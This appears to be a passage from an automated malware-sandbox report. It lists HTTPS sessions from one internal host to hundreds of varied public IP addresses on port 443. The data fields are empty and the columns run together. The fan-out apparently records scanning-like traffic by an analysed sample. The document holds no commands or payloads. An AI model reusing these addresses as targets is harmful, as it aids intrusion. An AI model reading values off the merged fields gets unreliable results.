                                          21963192.168.2.2346900156.109.106.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21964192.168.2.2351322190.121.141.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21965192.168.2.234468234.90.219.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21966192.168.2.2349222154.32.168.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21967192.168.2.2357598111.114.221.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21968192.168.2.2342868156.179.174.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21969192.168.2.2342874172.150.188.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21970192.168.2.233875086.172.133.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21971192.168.2.2333702145.3.172.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21972192.168.2.2358362106.2.172.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21973192.168.2.233704296.43.96.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21974192.168.2.2349930182.13.20.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21975192.168.2.2336554142.182.132.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21976192.168.2.234392042.205.134.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21977192.168.2.2358492146.171.38.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21978192.168.2.234705090.164.64.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21979192.168.2.2353640123.230.194.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21980192.168.2.2337888180.14.133.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21981192.168.2.2345706116.133.78.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21982192.168.2.235437899.206.185.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21983192.168.2.235897690.111.30.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21984192.168.2.236023693.56.230.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21985192.168.2.2354638203.171.203.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21986192.168.2.235288627.204.209.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21987192.168.2.2336938155.97.141.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21988192.168.2.2347474222.213.145.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21989192.168.2.234844842.157.11.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21990192.168.2.235657066.36.86.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21991192.168.2.233429651.26.102.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21992192.168.2.233310870.31.117.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21993192.168.2.234065242.227.216.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21994192.168.2.2352460139.100.128.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21995192.168.2.2351724137.23.149.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21996192.168.2.234361442.20.182.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21997192.168.2.233767271.161.76.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21998192.168.2.234111637.12.151.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21999192.168.2.2334220174.127.204.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22000192.168.2.233474817.46.84.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22001192.168.2.2340174220.205.108.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22002192.168.2.2355082181.136.223.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22003192.168.2.236065827.112.109.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22004192.168.2.2334384109.63.47.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22005192.168.2.2337772176.56.153.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22006192.168.2.235646067.73.98.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22007192.168.2.235846293.78.6.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22008192.168.2.235401642.226.151.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22009192.168.2.234745287.22.205.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22010192.168.2.2333940141.51.62.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22011192.168.2.235434427.100.52.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22012192.168.2.233315692.106.7.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22013192.168.2.233351069.11.20.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22014192.168.2.2355294121.220.17.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22015192.168.2.2340302197.176.237.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22016192.168.2.234974218.105.239.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22017192.168.2.234701276.225.55.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22018192.168.2.236076274.140.124.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22019192.168.2.234896892.49.121.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22020192.168.2.2346796118.205.221.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22021192.168.2.234609050.65.115.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22022192.168.2.2344038170.103.139.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22023192.168.2.234893297.16.79.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22024192.168.2.2348368107.135.72.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22025192.168.2.2338796140.66.246.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22026192.168.2.2332926181.143.9.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22027192.168.2.2346812141.31.166.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22028192.168.2.2352630169.61.26.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22029192.168.2.2346240223.16.218.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22030192.168.2.234396842.48.245.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22031192.168.2.2353386158.52.229.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22032192.168.2.2357798158.242.15.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22033192.168.2.2343498106.120.202.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22034192.168.2.235552019.13.104.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22035192.168.2.2336142143.28.210.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22036192.168.2.2360268209.179.65.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22037192.168.2.235094068.36.130.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22038192.168.2.235582870.161.52.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22039192.168.2.2339420123.182.197.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22040192.168.2.235526623.194.51.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22041192.168.2.2338842113.43.94.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22042192.168.2.2347156201.216.170.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22043192.168.2.2352494108.4.200.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22044192.168.2.2352426154.17.123.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22045192.168.2.235422427.105.234.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22046192.168.2.2358508108.131.163.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22047192.168.2.2360154131.61.26.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22048192.168.2.2347300183.223.210.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22049192.168.2.2344278212.54.88.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22050192.168.2.235382439.239.242.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22051192.168.2.2339710194.252.50.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22052192.168.2.23483221.173.99.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22053192.168.2.2347720111.17.216.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22054192.168.2.233537254.195.228.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22055192.168.2.23401088.189.98.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22056192.168.2.2353920179.176.197.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22057192.168.2.234959877.26.67.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22058192.168.2.2356002158.112.83.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22059192.168.2.2344216212.18.20.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22060192.168.2.2350874135.146.76.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22061192.168.2.233436485.173.218.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22062192.168.2.2359592103.133.36.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22063192.168.2.235205836.130.31.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22064192.168.2.2357394219.209.73.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22065192.168.2.233958219.214.58.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22066192.168.2.2352508144.72.131.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22067192.168.2.2344052187.239.51.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22068192.168.2.2352248196.142.70.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22069192.168.2.234058066.60.189.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22070192.168.2.2358730129.105.255.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22071192.168.2.2346562137.222.81.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22072192.168.2.234138823.220.160.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22073192.168.2.2340294171.170.93.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22074192.168.2.23538904.180.218.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22075192.168.2.2333490205.28.15.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22076192.168.2.2334166208.186.141.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22077192.168.2.235854223.74.178.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22078192.168.2.2349322200.51.168.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22079192.168.2.2353896203.125.69.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22080192.168.2.2337948133.40.102.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22081192.168.2.234408632.161.106.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22082192.168.2.2336394155.193.208.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22083192.168.2.2359596175.71.53.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22084192.168.2.236087218.1.58.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22085192.168.2.234194090.240.17.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22086192.168.2.234443262.172.136.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22087192.168.2.2335670178.197.22.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22088192.168.2.2351716116.72.119.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22089192.168.2.235374417.252.152.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22090192.168.2.234260859.213.248.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22091192.168.2.2334228149.207.152.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22092192.168.2.2345082165.83.109.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22093192.168.2.2350254157.191.135.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22094192.168.2.2338812185.41.63.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22095192.168.2.234834825.94.212.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22096192.168.2.2350872101.191.210.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22097192.168.2.235248872.86.194.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22098192.168.2.2335616184.36.161.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22099192.168.2.234422859.118.52.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22100192.168.2.2342510192.247.142.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22101192.168.2.23395441.103.227.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22102192.168.2.2340536102.5.154.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22103192.168.2.2360002128.3.120.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22104192.168.2.2337576146.244.34.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22105192.168.2.2354248183.57.93.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22106192.168.2.2346692188.160.191.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22107192.168.2.2354600162.64.170.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22108192.168.2.233464267.161.63.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22109192.168.2.235753851.178.71.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22110192.168.2.2337038213.172.201.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22111192.168.2.2340244161.116.1.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22112192.168.2.23525769.208.41.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22113192.168.2.2338728202.19.150.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22114192.168.2.235517465.67.238.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22115192.168.2.2356932144.51.33.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22116192.168.2.2333724110.87.101.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22117192.168.2.234409639.214.100.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22118192.168.2.235487899.203.138.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22119192.168.2.233493450.44.130.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22120192.168.2.233834852.136.164.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22121192.168.2.2355826121.138.251.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22122192.168.2.234727658.67.197.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22123192.168.2.2342166204.85.150.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22124192.168.2.235392427.162.50.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22125192.168.2.2348518219.49.85.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22126192.168.2.2333702216.36.250.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22127192.168.2.235566619.83.125.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22128192.168.2.2359440136.45.161.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22129192.168.2.2346534173.176.234.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22130192.168.2.235019282.94.51.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22131192.168.2.234402665.38.210.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22132192.168.2.2346356105.254.189.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22133192.168.2.2336290106.172.195.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22134192.168.2.2345392194.142.164.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22135192.168.2.233505637.159.82.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22136192.168.2.2346044188.182.57.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22137192.168.2.234358675.188.37.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22138192.168.2.234658260.129.245.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22139192.168.2.233294473.158.72.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22140192.168.2.2359112132.148.143.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22141192.168.2.2339332116.102.24.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22142192.168.2.2351330173.144.180.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22143192.168.2.2346222131.16.81.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22144192.168.2.235650836.126.155.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22145192.168.2.235708478.246.19.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22146192.168.2.2338194113.239.90.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22147192.168.2.234148635.244.148.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22148192.168.2.2360736210.77.232.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22149192.168.2.2334932200.52.91.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22150192.168.2.2347650210.84.186.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22151192.168.2.235238661.153.243.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22152192.168.2.233827061.152.175.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22153192.168.2.2349414119.175.30.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22154192.168.2.2343562154.98.149.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22155192.168.2.234087465.207.229.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22156192.168.2.2345572103.69.62.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22157192.168.2.234644476.91.193.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22158192.168.2.2336150151.19.224.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22159192.168.2.23600929.194.109.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22160192.168.2.2354420134.95.215.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22161192.168.2.235907851.72.2.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22162192.168.2.2344208140.49.161.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22163192.168.2.2357164128.75.244.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22164192.168.2.23438789.22.61.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22165192.168.2.2338778142.163.227.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22166192.168.2.2338632204.220.229.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22167192.168.2.2344586176.116.137.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22168192.168.2.2337460134.82.103.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22169192.168.2.234748639.14.206.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22170192.168.2.233661092.240.74.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22171192.168.2.2357074223.172.53.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22172192.168.2.2347090219.178.209.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22173192.168.2.2343978173.119.149.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22174192.168.2.2335204137.228.75.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22175192.168.2.234950647.200.7.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22176192.168.2.2353228134.248.86.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22177192.168.2.234381069.107.97.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22178192.168.2.2357146180.126.167.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22179192.168.2.2343804153.160.91.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22180192.168.2.234097676.104.136.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22181192.168.2.2338454168.169.176.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22182192.168.2.2353306173.239.229.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22183192.168.2.233493654.139.11.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22184192.168.2.234969625.105.180.200443
                                          TimestampBytes transferredDirectionData


